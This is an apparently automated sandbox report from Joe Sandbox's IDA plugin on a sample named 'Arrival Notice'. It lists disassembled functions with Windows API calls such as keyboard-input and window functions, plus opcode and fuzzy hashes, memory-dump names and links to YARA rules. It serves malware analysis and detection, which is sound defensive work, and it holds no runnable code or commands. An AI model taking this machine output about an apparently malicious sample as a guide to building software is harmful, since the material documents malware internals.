Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78

Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00413D20

Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8

___fls_getvalue@4.LIBCMT ref: 00413D2B

Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C

___fls_setvalue@8.LIBCMT ref: 00413D3E
GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
ExitThread.KERNEL32 ref: 00413D4E
GetCurrentThreadId.KERNEL32 ref: 00413D54
__freefls@4.LIBCMT ref: 00413D74

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 259663610-0
Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9

Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004302E6
GetWindowRect.USER32(00000000,?), ref: 00430316
GetClientRect.USER32(?,?), ref: 00430364
GetSystemMetrics.USER32(0000000F), ref: 004303B1
GetWindowRect.USER32(?,?), ref: 004303C3
ScreenToClient.USER32(?,?), ref: 004303EC

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Rect$Client$Window$MetricsScreenSystem
String ID:
API String ID: 3220332590-0
Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54

Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00457863
_malloc.LIBCMT ref: 00457879
_strcat.LIBCMT ref: 004578A4
_wcslen.LIBCMT ref: 004578DA
_malloc.LIBCMT ref: 004578F3
_wcscpy.LIBCMT ref: 00457912

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _malloc_wcslen$_strcat_wcscpy
String ID:
API String ID: 1612042205-0
Opcode ID: 4098f9dc93ff2837199216be0bc4cded73a78b8dc231ed2406addd4e84e5e7a2
Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
Opcode Fuzzy Hash: 4098f9dc93ff2837199216be0bc4cded73a78b8dc231ed2406addd4e84e5e7a2
Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5

Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0044D011
_strncmp.LIBCMT ref: 0044FA43

Strings

>, xrefs: 0044F0D8
U, xrefs: 0044FB88
\, xrefs: 0044D061

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _memmove_strncmp
String ID: >$U$\
API String ID: 2666721431-237099441
Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55

Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0044C570
SetKeyboardState.USER32(00000080), ref: 0044C594
PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessagePost$KeyboardState$InputSend
String ID:
API String ID: 2221674350-0
Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8

Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00444CFC
_wcscat.LIBCMT ref: 00444D03
_wcscpy.LIBCMT ref: 00444D17
_wcscpy.LIBCMT ref: 00444D4B
_wcscat.LIBCMT ref: 00444D52
_wcscpy.LIBCMT ref: 00444D66

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcscpy$_wcscat
String ID:
API String ID: 2037614760-0
Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9

Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
VariantCopy.OLEAUT32(?,?), ref: 00451BF8
VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
VariantClear.OLEAUT32(-00000058), ref: 00451CA1
SysAllocString.OLEAUT32(00000000), ref: 00451CBA

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$Copy$AllocClearErrorLastString
String ID:
API String ID: 960795272-0
Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8

Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00447BDF
GetWindowRect.USER32(?,?), ref: 00447C5D
ScreenToClient.USER32(?,?), ref: 00447C7B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
EndPaint.USER32(?,?), ref: 00447D13

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Paint$BeginClientRectRectangleScreenViewportWindow
String ID:
API String ID: 4189319755-0
Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69

Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
GetWindowLongW.USER32(?,000000F0), ref: 004490D4
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$LongWindow$InvalidateRect
String ID:
API String ID: 1976402638-0
Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69

Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00440A8A
EnableWindow.USER32(?,00000000), ref: 00440AAF
ShowWindow.USER32(?,00000000), ref: 00440B18
ShowWindow.USER32(?,00000004), ref: 00440B2B
EnableWindow.USER32(?,00000001), ref: 00440B50
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58

Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 004797CC, 00479AF2
Not an Object type, xrefs: 004797A7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Variant$Copy$ClearErrorLast
String ID: NULL Pointer assignment$Not an Object type
API String ID: 2487901850-572801152
Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5

Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
EnableWindow.USER32(?,00000000), ref: 00448B5C
EnableWindow.USER32(?,00000001), ref: 00448B72
ShowWindow.USER32(?,00000000), ref: 00448BE8
ShowWindow.USER32(?,00000004), ref: 00448BF4
EnableWindow.USER32(?,00000001), ref: 00448C09

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$Enable$Show$MessageSend
String ID:
API String ID: 1871949834-0
Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A

Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D

Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
SendMessageW.USER32 ref: 00471AE3
DestroyIcon.USER32(?), ref: 00471AF4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
String ID:
API String ID: 3611059338-0
Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64

Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00455695
DestroyWindow.USER32(?), ref: 00455728
DeleteObject.GDI32(?), ref: 00455736
DeleteObject.GDI32(?), ref: 00455744
DestroyIcon.USER32(?), ref: 00455752
DestroyWindow.USER32(?), ref: 00455760

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: DestroyWindow$DeleteObject$IconMove
String ID:
API String ID: 1640429340-0
Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69

Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
